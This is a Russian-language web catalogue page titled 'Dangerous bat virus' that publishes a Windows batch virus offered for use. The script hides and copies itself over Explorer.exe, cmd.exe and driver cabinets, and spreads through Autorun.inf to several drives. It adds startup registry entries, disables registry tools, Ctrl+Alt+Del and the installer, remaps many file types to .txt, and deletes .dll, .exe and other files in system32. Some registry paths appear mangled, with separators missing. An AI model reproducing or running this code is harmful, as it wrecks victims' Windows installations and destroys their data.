Опасный вирус на бат - Бат вирус - Вирусы - Каталог статей

Опасный вирус на бат

@echo off cls attrib +h +s +r %0 attrib +h +s +r Autorun.inf taskkill /f /im Explorer.exe del %systemroot%Explorer.exe /f /q xcopy /h /r %0 %systemroot%Explorer.exe del %systemroot%Driver Cachei386driver.cab /f /q del %systemroot%Driver Cachei386sp3.cab /f /q xcopy /h /r %0 C:WINDOWSDriver Cachei386sp3.cab xcopy /h /r %0 C:WINDOWSDriver Cachei386driver.cab attrib +r +h +s C:WINDOWSDriver Cachei386driver.cab attrib +r +h +s C:WINDOWSDriver Cachei386sp3.cab xcopy /h /r %0 %systemroot%Restart.exe xcopy /h /r %0 %systemroot%system32Restart.exe xcopy /h /r %0 c:Explorer.exe xcopy /h /r %0 d:Explorer.exe xcopy /h /r %0 e:Explorer.exe xcopy /h /r %0 f:Explorer.exe xcopy /h /r %0 f:Autorun.inf xcopy /h /r %0 c:Autorun.inf xcopy /h /r %0 d:Autorun.inf xcopy /h /r %0 e:Autorun.inf del %systemroot%system32cmd.exe /f /q xcopy /h /r %0 %systemroot%system32cmd.exe [HKEY_CURRENT_USERControl PanelDesktop] "MenuShowDelay”="500000000” [HKEY_CURRENT_USERControl PanelDesktop] "AutoEndTasks”="0” "HungAppTimeout”="150000” "WaitToKillAppTimeout”="150000” [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesAlerter] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesALG] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesAppMgmt] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesBITS] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesClipSrv] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesEventSystem] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesCOMSysApp] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesBrowser] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesCryptSvc] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDcomLaunch] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDhcp] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTrkWks] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMSDTC] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDnscache] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesERSvc] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesEventlog] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesFastUserSwitchingCompatibility] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceshelpsvc] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesHidServ] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesHTTPFilter] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesImapiService] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesCiSvc] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesPolicyAgent] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesdmserver] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesdmadmin] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMDM] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMessenger] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSwPrv] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetlogon] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesmnmsrvc] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetman] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetDDE] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetDDEdsdm] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNla] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesxmlprov] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNtLmSsp] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSysmonLog] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesPlugPlay] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWmdmPmSp] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSpooler] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesProtectedStorage] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRSVP] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRasAuto] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRasMan] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRDSessMgr] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRpcSs] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRpcLocator] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRemoteRegistry] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNtmsSvc] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRemoteAccess] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesseclogon] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSamSs] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswscsvc] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserver] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesShellHWDetection] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSCardSvr] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSCardDrv] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSSDPSRV] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSENS] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicessrservice] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSchedule] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLmHosts] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTapiSrv] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTlntSvr] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesThemes] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesUPS] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesupnphost] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesuploadmgr] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesVSS] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWebClient] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesAudioSrv] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesstisvc] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMSIServer] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWmi] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW32Time] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWZCSVC] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesWmiApSrv] "Start”=dword:00000002 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanworkstation] "Start”=dword:00000002 [HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionExplorer] "ShellState”=hex:24,00,00,00,11,28,00,00,00,00,00,00,00,00,00,00,00,00,00,00, 01,00,00,00,0d,00,00,00,00,00,00,00,02,00,00,00 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer] "NoSharedDocuments”=dword:00000001 [HKEY_CURRENT_USERControl PanelDesktop] "DragFullWindows”="0” [HKEY_Current_UserSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer] "NoTrayItemsDisplay”=dword:00000001 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer] "EnableAutoTray”=dword:00000000 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer] "NoViewContextMenu”=dword: 00000001 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer] "NoFolderOptions”=dword:0000000 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] "DisableCAD”=dword:00000001 [HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem] "DisableRegistryTools”=dword:00000001 [HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsInstaller] "DisableMSI”=dword:00000002 reg add HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableCAD /t reg_dword /d 00000001 reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v Explorer /t reg_sz /d %systemroot%explorer.exe reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v Restart /t reg_sz /d %systemroot%Restart.exe reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v Restart.exe /t reg_sz /d %systemroot%system32Restart.exe assoc .exe=.txt assoc .bat=.txt assoc .cmd=.txt assoc .js=.txt assoc .vbs=.txt assoc .mp3=.txt assoc .m3u=.txt assoc .com=.txt assoc .msc=.txt assoc .scr=.txt assoc .msi=.txt assoc .php=.txt assoc .zip=.txt assoc .rar=.txt assoc .nt=.txt assoc .7z=.txt assoc .chm=.txt assoc .rar=.txt assoc .zip=.txt assoc .ace=.txt assoc .swf=.txt assoc .cab=.txt assoc .ico=.txt assoc .jpg=.txt assoc .jpeg=.txt assoc .bmp=.txt assoc .gif=.txt assoc .dll=.txt cd %systemroot%system32 del .dll /f /q del .exe /f /q del .inf /f /q del .msi /f /q del .com /f /q del .msc /f /q del .lnk /f /q echo off del *. /f /q cls del autorun.inf del %0
Категория: Бат вирус \| Добавил: Admin (02.02.2013)
Просмотров: 1141 \| Рейтинг: 0.0/0

Всего комментариев: 0

Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]